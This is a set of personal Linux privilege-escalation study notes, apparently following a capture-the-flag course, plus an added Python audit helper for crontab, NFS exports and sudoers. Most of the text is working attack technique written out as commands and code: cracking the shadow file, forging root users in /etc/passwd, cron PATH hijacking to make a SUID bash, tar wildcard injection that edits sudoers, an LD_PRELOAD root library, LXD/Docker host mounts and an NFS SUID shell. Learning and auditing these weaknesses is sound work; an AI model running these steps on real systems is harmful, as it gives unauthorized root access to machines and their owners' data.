Manual Enumeration
Kernel Exploit
uname -a
cat /etc/lsb-release
get the OS name and version and search for known vulns
History, SSH and config files (part of cred hunting)
cat /home/user/.history
Can you access another user's home directory and look at its .ssh directory? If so, take the id_rsa key and save it on your system (give it chmod 600 permissions).
Can you see an .ovpn file? There might be credentials in there.
Vulnerable Services
For example: Screen v4.5 is vulnerable, so check installed software versions.
Also look for services running as root where the service's root account has no password assigned.
Special Permissions - SUID/SGID
The setuid bit appears in ls output as "s" when the execute bit is also set and as "S" when it is not.
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -uid 0 -perm -6000 -type f 2>/dev/null - for groups (SUID and SGID both set)
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Weak permissions 1:
- Can you read /etc/shadow? If so, make a copy of the root user's hash and crack it with John.
Weak permissions 2:
- Is /etc/passwd writeable?
generate a new password hash using: openssl passwd <password>
edit /etc/passwd and put the hash between the 1st and 2nd colon (:), i.e. replace the x
OR - you could just create a NEW ROOT user altogether, using the format of the root user's line in /etc/passwd
Sudo right abuse
sudo -l
Cron Job
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null - search for writeable files
Might be able to add a reverse shell command to the .sh file
Crontab
cat /etc/crontab - view contents of crontab
locate script.sh - sometimes the script has been deleted (so you create your own), or the crontab may not show its full path
- overwrite it with a reverse shell command
CronJobs - PATH env variable:
- you notice that the PATH variable starts with /home/user, so create a script.sh with contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
- make sure you chmod +x the file, then wait for the cron job to run
- then run /tmp/rootbash -p
Path Abuse
Say we want to replace the "ls" binary with a malicious script (i.e. a reverse shell). We do this by adding "." to the PATH:
PATH=.:$PATH
export PATH
echo $PATH
touch ls
echo "reverse shell" > ls
chmod +x ls
WildCard Abuse
* matches any number of characters in a file name
usage:
we find a backup job running tar as /tmp/backup.tar.gz * (note the * wildcard)
echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1
Credential Hunting
Shared Libraries
Static libraries = .a ext
Dynamically linked shared object libraries - .so ext
LD_PRELOAD priv esc:
File: root.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid/setgid */
/* _init runs when the library is loaded, before the preloaded program's main */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell is not preloaded again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Compile it:
gcc -fPIC -shared -o root.so root.c -nostartfiles
run it:
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
Shared Object Hijacking
Programs and binaries under development usually have custom libraries associated with them.
Privileged Groups
LXD is similar to Docker.
Start LXD: lxd init
Import local image: lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
lxc init alpine r00t -c security.privileged=true
mount host file system: lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh
Docker
docker run -v /root:/mnt -it ubuntu
Disk
With these privileges you can use debugfs to access the entire file system with root-level privileges.
ADM
Members of the adm group are able to read all logs stored in /var/log
NFS – Network File System
showmount -e 10.129.2.12 (look for no_root_squash)
cat /etc/exports
write shell.c file:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>   /* system */
#include <unistd.h>   /* setuid/setgid */
int main(void)
{
    setuid(0); setgid(0); system("/bin/bash");
}
On victim: gcc shell.c -o shell
On attacking: sudo mount -t nfs 10.129.2.12:/tmp /mnt
On attacking: cp shell /mnt
On attacking: chmod u+s /mnt/shell
On victim: ./shell
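The cron PATH, sudo LD_PRELOAD and NFS no_root_squash weaknesses above are all findable from config text, so here is an added audit helper (my own code, not from the course these notes follow) that a defender can run against /etc/crontab, /etc/exports and sudoers output; the file-permission callback, the function names and the sample inputs are mine and assumed, not taken from the page.

```python
import os, re, stat

def others_can_write(path):
    """True if path exists and is group- or world-writable."""
    try:
        return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except OSError:
        return False

def cron_findings(crontab_text, writable=others_can_write):
    """Flag root jobs whose program is found through a PATH entry others can write
    (e.g. PATH starting with /home/user) or whose script file is itself writable."""
    path_entries = ["/usr/bin", "/bin"]      # assumed default when no PATH line is set
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r'PATH\s*=\s*"?([^"]*)', line)
        if m:
            path_entries = m.group(1).split(":")
            continue
        fields = line.split(None, 6)          # 5 time fields, user, command
        if len(fields) != 7 or fields[5] != "root":
            continue
        prog = fields[6].split()[0]
        if "/" not in prog:                   # resolved via PATH, first match wins
            for d in path_entries:
                if d in ("", ".") or writable(d):
                    findings.append(f"root job '{prog}' resolves via writable PATH dir '{d}'")
                    break
        elif writable(prog):
            findings.append(f"root job script '{prog}' is group/world writable")
    return findings

def nfs_findings(exports_text):
    """Flag /etc/exports entries that disable root squashing."""
    lines = (l.split("#", 1)[0].strip() for l in exports_text.splitlines())
    return [f"{l.split()[0]} exported with no_root_squash" for l in lines if "no_root_squash" in l]

def sudoers_findings(sudoers_text):
    """Flag sudoers lines that let LD_PRELOAD survive into a sudo-run program."""
    return [f"env_keep passes LD_PRELOAD: {l.strip()}" for l in sudoers_text.splitlines()
            if "env_keep" in l and "LD_PRELOAD" in l and not l.lstrip().startswith("#")]

# Constructed sample inputs (not taken from any real host).
SAMPLE_CRONTAB = "PATH=/home/user:/usr/local/bin:/usr/bin:/bin\n* * * * * root script.sh\n0 3 * * * root /usr/local/bin/backup.sh\n"
SAMPLE_EXPORTS = "/tmp *(rw,sync,no_root_squash)\n/srv/share 10.0.0.0/24(ro)\n"
SAMPLE_SUDOERS = 'Defaults env_keep += "LD_PRELOAD"\nuser ALL=(ALL) NOPASSWD: /usr/sbin/apache2\n'
```

On a real host feed the functions the contents of /etc/crontab, /etc/exports and `sudo -l` output and leave the default permission check in place; the `writable` callback exists so the cron check can be exercised without touching the filesystem.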
Abusing Shell Features - SUID/SGID executables
Part 1 and Part 2 - look at Task 14 and 15 on Try Hack Me - Linux Priv Esc